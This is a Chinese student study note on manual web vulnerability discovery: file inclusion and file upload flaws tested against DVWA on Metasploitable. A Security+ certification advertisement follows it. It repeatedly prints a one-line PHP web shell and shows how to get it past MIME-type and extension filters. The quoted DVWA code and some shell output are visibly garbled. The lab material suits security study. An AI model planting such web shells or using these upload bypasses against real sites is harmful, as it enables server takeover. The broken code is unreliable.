【安全牛學習筆記】手動漏洞挖掘(四)

手動漏洞挖掘

本地文件包含lfi

    查看文件

    代碼執行

        <?php echo shell_exec($_GET['cmd']);?>

        Apache access.log

遠程文件包含rfi

    出現概率少於lfi,但更容易被利用

    /usr/share/wfuzz/wordlist/vulns/

手動漏洞挖掘

文件上傳漏洞

    <?php echo shell_exec($_GET['cmd']);?>

直接上傳webshell

修改文件類型上傳webshell

    Mimetype----文件頭、擴展名

修改擴展名上傳webshell

    靜態解析文件擴展名時可能無法執行

文件頭繞過過濾上傳webshell

上傳目錄權限

root@kali:~# vi 1.oho

 <?php echo shell_exec($_GET['cmd']);?>

-------------------------------------------------------------------------

低安全代碼

<?php

    if (isset($_POST['Upload'])) {

    

        $target_path = DVWA_WEB_PAGE_TO_ROOT "hackable/uploads/";

        $target_path = $target_path . basename( $_FILES['uploade']['name']

        if(!move_uploaded_file($_FILES('uploaded']['tmp_name']. $target_path)) {

            echo '<pre>';

            echo 'Your image was not uploaded.';

            echo  '</pre>';

         } else {

            echo '<pre>';

            echo $target_path . ' successfully uploaded!';

            echo '</pre>';

         }

    }

?>

----------------------------------------------------------------------------

中安全代碼

<?php

    if (isset($_POST['Upload'])) {

    

        $target_path = DVWA_WEB_PAGE_TO_ROOT "hackable/uploads/";

        $target_path = $target_path . basename( $_FILES['uploade']['name']

        $uploaded_name = $_FILES['uploade']['name']

        $uploaded_name = $_FILES['uploade']['type']

        $uploaded_name = $_FILES['uploade']['size']

        if(!move_uploaded_file($_FILES('uploaded']['tmp_name']. $target_path)) {

            echo '<pre>';

            echo 'Your image was not uploaded.';

            echo  '</pre>';

         } else {

            echo '<pre>';

            echo $target_path . ' successfully uploaded!';

            echo '</pre>';

         }

    }

?>

-------------------------------------------------------------------------------------

msfadmin@metasploitable:~$ cd /var/www/dvwa/hackable/uploads/

msfadmin@metasploitable:/var/www/dvwa/hackable/uploads$ sudo rm 1*

msfadmin@metasploitable:/var/www/dvwa/hackable/uploads$ sudo rm 1.png

msfadmin@metasploitable:/var/www/dvwa/hackable/uploads$ ls

dvwa_email.png

root@kali:~# minetype

root@kali:~# minetype 1.php

1.php: application/x-php

root@kali:~# cd 桌面/

root@kali:~/桌面# minetype 1.png

1.png: image/png

root@kali:~/桌面# minetype 1.jpg

1.jpg: image/jpeg

root@kali:~/桌面# cd ..

root@kali:~/# ls

1.php    hs_err_pid2958.log      公共  視頻  文檔  音樂

?????    ZAP_2.4.3_Linux.tar.gz  模板  圖片  下載  桌面

root@kali:~/# 1.php

root@kali:~/# cp 1.php a.jpg

root@kali:~/# ls

1.php  a.jpg                   hs_err_pid2958.log  模板  圖片  下載  桌面

?????  ZAP_2.4.3_Linux.tar.gz  公共                視頻  文檔  音樂

root@kali:~/# minetype a.jpg

a.jpg: applicaton/x-php

-------------------------------------------------------------------------------

高安全代碼

<?php

    if (isset($_POST['Upload'])) {

    

        $target_path = DVWA_WEB_PAGE_TO_ROOT "hackable/uploads/";

        $target_path = $target_path . basename( $_FILES['uploade']['name']

        $uploaded_name = $_FILES['uploade']['name']

        $uploaded_ext = substr($uploaded_name,strrpos($uploaded_name. '.') +1);

        $uploaded_name = $_FILES['uploade']['size']

        

        if(($uploaded_ext == "jgp" || $uploaded_ext == "JPG" || $uploaded_ext == "jpeg" || $uploaded_ext == "JPEG") && ($uploaded_size < 100000)){

            if(!move_uploaded_file($_FILES('uploaded']['tmp_name']. $target_path)) {

                echo '<pre>';

                echo 'Your image was not uploaded.';

                echo  '</pre>';

             } else {

                echo '<pre>';

                echo $target_path . ' successfully uploaded!';

                echo '</pre>';

             }

        }

    }

?>

---------------------------------------------------------------------------------

msfadmin@metasploitable:/var/www/dvwa/hackable/uploads$ sudo rm *

把圖片信息刪除,換成<?php echo shell_exec($_GET['cmd']);?>

msfadmin@metasploitable:/var/www/dvwa/hackable/uploads$ ls

2.jpg   2.php.jpeg

msfadmin@metasploitable:/var/www/dvwa/hackable/uploads$ cat 2.jpeg

cat: 2.jpeg: Permission denied

msfadmin@metasploitable:/var/www/dvwa/hackable/uploads$ sudo cat 2.jpeg

*PNG

<?php echo shell_exec($_GET['cmd']);?>msfadmin@metasploitable:/var/www/dvwa/hackable/uploads$ sudo  cat 2.php.jpeg

<?php echo shell_exec($_GET['cmd']);?>msfadmin@metasploitable:/var/www/dvwa/hackable/uploads$ ls -l

total 8

-rw------- 1 www-date www-data 46 2016-01-19 07:48 2.jpeg

-rw------- 1 www-date www-data 46 2016-01-19 07:51 2.php.jpeg

msfadmin@metasploitable:/var/www/dvwa/hackable/uploads$ cd ..

msfadmin@metasploitable:/var/www/dvwa/hackable$ ls

uploads  users

msfadmin@metasploitable:/var/www/dvwa/hackable$ ls -l

total 8

-rw------- 1 www-date www-data 46 2016-01-19 07:51 uploads

-rw------- 1 www-date www-data 46 2016-01-19 07:22 users

msfadmin@metasploitable:/var/www/dvwa/hackable$ sudo chmod o-x uploads/

msfadmin@metasploitable:/var/www/dvwa/hackable$ ls -l

total 8

-rw------- 1 www-date www-data 46 2016-01-19 07:51 uploads

-rw------- 1 www-date www-data 46 2016-01-19 07:22 users

msfadmin@metasploitable:/var/www/dvwa/hackable$ sudo -i

msfadmin@metasploitable:~$ cd /var/www/dvwa/hackable/uploads/

msfadmin@metasploitable:/var/www/dvwa/hackable/uploads$ ls -l

total 8

-rw------- 1 www-date www-data 46 2016-01-19 07:48 2.jpeg

-rw------- 1 www-date www-data 46 2016-01-19 07:51 2.php.jpeg

msfadmin@metasploitable:/var/www/dvwa/hackable$ cd ..

msfadmin@metasploitable:/var/www/dvwa/hackable$ ls

uploads  users

msfadmin@metasploitable:/var/www/dvwa/hackable$ ls -l

total 8

drwxr-xr-- 1 www-date www-data 46 2016-01-19 07:51 uploads

drwxr-xr-x 1 www-date www-data 46 2016-01-19 07:22 users

msfadmin@metasploitable:/var/www/dvwa/hackable$ chmod a-x uploads/

msfadmin@metasploitable:/var/www/dvwa/hackable$ ls -l

total 8

drw-r-xr-- 1 www-date www-data 46 2016-01-19 07:51 uploads

drwxr-xr-x 1 www-date www-data 46 2016-01-19 07:22 users

該筆記爲安全牛課堂學員筆記,想看此課程或者信息安全類乾貨可以移步到安全牛課堂


Security+認證爲什麼是互聯網+時代最火爆的認證?

      牛妹先給大家介紹一下Security+


        Security+ 認證是一種中立第三方認證,其發證機構爲美國計算機行業協會CompTIA ;是和CISSP、ITIL 等共同包含在內的國際 IT 業 10 大熱門認證之一,和CISSP偏重信息安全管理相比,Security+ 認證更偏重信息安全技術和操作。

       通過該認證證明了您具備網絡安全,合規性和操作安全,威脅和漏洞,應用程序、數據和主機安全,訪問控制和身份管理以及加密技術等方面的能力。因其考試難度不易,含金量較高,目前已被全球企業和安全專業人士所普遍採納。

Security+認證如此火爆的原因?  

       原因一:在所有信息安全認證當中,偏重信息安全技術的認證是空白的, Security+認證正好可以彌補信息安全技術領域的空白 。

      目前行業內受認可的信息安全認證主要有CISP和CISSP,但是無論CISP還是CISSP都是偏重信息安全管理的,技術知識講的寬泛且淺顯,考試都是一帶而過。而且CISSP要求持證人員的信息安全工作經驗都要5年以上,CISP也要求大專學歷4年以上工作經驗,這些要求無疑把有能力且上進的年輕人的持證之路堵住。在現實社會中,無論是找工作還是升職加薪,或是投標時候報人員,認證都是必不可少的,這給年輕人帶來了很多不公平。而Security+的出現可以掃清這些年輕人職業發展中的障礙,由於Security+偏重信息安全技術,所以對工作經驗沒有特別的要求。只要你有IT相關背景,追求進步就可以學習和考試。

       原因二: IT運維人員工作與翻身的利器。

       在銀行、證券、保險、信息通訊等行業,IT運維人員非常多,IT運維涉及的工作面也非常廣。是一個集網絡、系統、安全、應用架構、存儲爲一體的綜合性技術崗。雖然沒有程序猿們“生當做光棍,死亦寫代碼”的悲壯,但也有着“鋤禾日當午,不如運維苦“的感慨。天天對着電腦和機器,時間長了難免有對於職業發展的迷茫和困惑。Security+國際認證的出現可以讓有追求的IT運維人員學習網絡安全知識,掌握網絡安全實踐。職業發展朝着網絡安全的方向發展,解決國內信息安全人才的匱乏問題。另外,即使不轉型,要做好運維工作,學習安全知識取得安全認證也是必不可少的。

        原因三:接地氣、國際範兒、考試方便、費用適中!

CompTIA作爲全球ICT領域最具影響力的全球領先機構,在信息安全人才認證方面是專業、公平、公正的。Security+認證偏重操作且和一線工程師的日常工作息息相關。適合銀行、證券、保險、互聯網公司等IT相關人員學習。作爲國際認證在全球147個國家受到廣泛的認可。

        在目前的信息安全大潮之下,人才是信息安全發展的關鍵。而目前國內的信息安全人才是非常匱乏的,相信Security+認證一定會成爲最火爆的信息安全認證。

發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章